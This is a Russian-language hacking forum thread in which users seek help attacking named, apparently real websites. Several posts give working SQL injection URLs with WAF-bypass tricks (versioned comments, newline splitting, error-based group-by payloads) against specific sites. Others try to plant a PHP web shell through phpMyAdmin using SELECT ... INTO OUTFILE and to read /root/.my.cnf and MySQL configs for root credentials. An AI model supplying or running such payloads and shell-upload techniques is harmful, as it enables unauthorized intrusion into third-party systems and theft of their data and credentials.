Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Br@!ns

    [email protected]!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25

    а как дальше вот это обойти можно? :)

    HTML:
    https://www.swallowtailfarms.com//store/?cat_id=43'/*!50000union*/+/*!50000select*/+1,2,table_name,4,5,version(),7+from/**/information_schema.tables--%20
    
     
    #23681 [email protected]!ns, 9 Dec 2014
    Last edited: 9 Dec 2014
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    докручивай через post запрос, там error-based.

    [​IMG]

    [​IMG]
     
    _________________________
    1 person likes this.
  3. Br@!ns

    [email protected]!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Не получается обойти фильтр на слово information_schema.
    /*!information_schema*/ , dgsdginformation_schemasdgsdg, частичное и полное url кодирование не помогают, какие еще варианты есть?

    http://www.globekey.com/weblink/index.php?hid=USM5829k'+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14,15,16+--+

    сайт банит ip при неудачных попытках
     
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196
    Щас выложат и завтра уже залепят новый фильтр. А по сути реально способов обойти mod security и подобные WAF не так уж и много и почти все уже в фильтрах.
     
    2 people like this.
  5. Br@!ns

    [email protected]!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    не получается обойти waf с фильтром на union select, selecr from. какие решениея есть? мб етсь возможность составить запрос, гду from будет впереди select, или как нибудь по-другому??
    http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+||@:=10+group+by+left(version(),@:[email protected])having+min(0)
     
  6. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+or+1+group+by+concat((select+table_name+%0A+from+information_schema.tables+limit+1,1),floor(rand(0)*2))having+min(0)
    разбиваем запрос переносом строки
     
    3 people like this.
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    Code:
    http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029||@:=10+group+by+left((select%23+faza%0Atable_name+from+information_schema.tables+limit+1,1),@:[email protected])having+min(0)
     
    _________________________
    2 people like this.
  8. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    176
    Likes Received:
    38
    Reputations:
    18
    Подскажите как можно залить шелл через phpmyadmin. Не root

    Есть пути, пробовал через SELECT '<?php system($cmd) ?>' INTO OUTFILE '/путь/shell.php'

    #1045 - Access denied for user 'user'@'localhost' (using password: YES)

    Версия MySQL-клиента: 5.1.73

    Пробовал вывести на страницы код php, но выводит как текст.

    Интересуют всевозможные способы.
     
    #23688 I love this game, 18 Dec 2014
    Last edited: 18 Dec 2014
  9. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Никак, прав нету
     
    _________________________
  10. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    303
    Likes Received:
    35
    Reputations:
    0
    без рута не как. так как нету прав на запить. сам когда то мучался пару месяцев. ищи в базе возможно есть база цмс какойто через которую можно залить
     
  11. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    Вы все неправы, можно залиться
    https://rdot.org/forum/showthread.php?t=741
     
  12. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    в топике нет ни слова про заливку
    только чтение
     
  13. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    А Вы головой подумайте.
     
  14. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    176
    Likes Received:
    38
    Reputations:
    18
    Спасибо, если я правильно понял, ты ты намекаешь, на то что можно прочитать любые файлы. Если так, то работает, но вряд ли поможет залить шелл. Или же все-таки можно при помощи LOAD DATA INFILE как-то напрямую залить шелл? Я просто не силен в MySQL.
     
  15. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Прочитай конфиги мускула и зайди уже из под рута.
     
    _________________________
    2 people like this.
  16. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    176
    Likes Received:
    38
    Reputations:
    18
    Прочитал этот файл /etc/mysql/my.cnf
    Но пароля там нет.

    Пытаюсь этот прочитать
    LOAD DATA LOCAL INFILE '/root/.my.cnf' INTO TABLE mytable FIELDS TERMINATED BY '\n'

    Выдает ошибку.
    #13 - File '/root/.my.cnf' not found (Errcode: 13)



    Upd. Еще у меня есть форма входа в ISP Manager. Может от него можно как-то узнать логин и пас?
     
    #23696 I love this game, 18 Dec 2014
    Last edited: 19 Dec 2014
  17. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    303
    Likes Received:
    35
    Reputations:
    0
    хм.. пробовал
    Code:
    LOAD DATA LOCAL INFILE '/etc/mysql/my.cnf' INTO TABLE test FIELDS TERMINATED BY '\n'
    выдает
    Code:
    #2000 - open_basedir restriction in effect. Unable to open file
    или файл не найден на старых версиях пхпмайадмина
    Code:
    #2 - File '/etc/mysql/my.cnf' not found (Errcode: 2)
    #13 - File '/root/.my.cnf' not found (Errcode: 13)  
    и так на больше 10 майадминов без рута
     
    #23697 mazaxaka, 18 Dec 2014
    Last edited: 18 Dec 2014
  18. Br@!ns

    [email protected]!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Можно тут что нибудь сделать?
    фильтрует запятые, скобки
     
    #23698 [email protected]!ns, 19 Dec 2014
    Last edited: 19 Dec 2014
  19. zarif

    zarif Banned

    Joined:
    12 Feb 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Wulnerable это выдал.
    Можно здесь что-нибудь сделать?
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    inj в order by — значит только blind или error-based. фильтр на = и (
    урленкод и даблурленкод тоже не помог, да и векторов без использования скобок я не видел.
     
    _________________________
    #23700 yarbabin, 19 Dec 2014
    Last edited: 19 Dec 2014
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.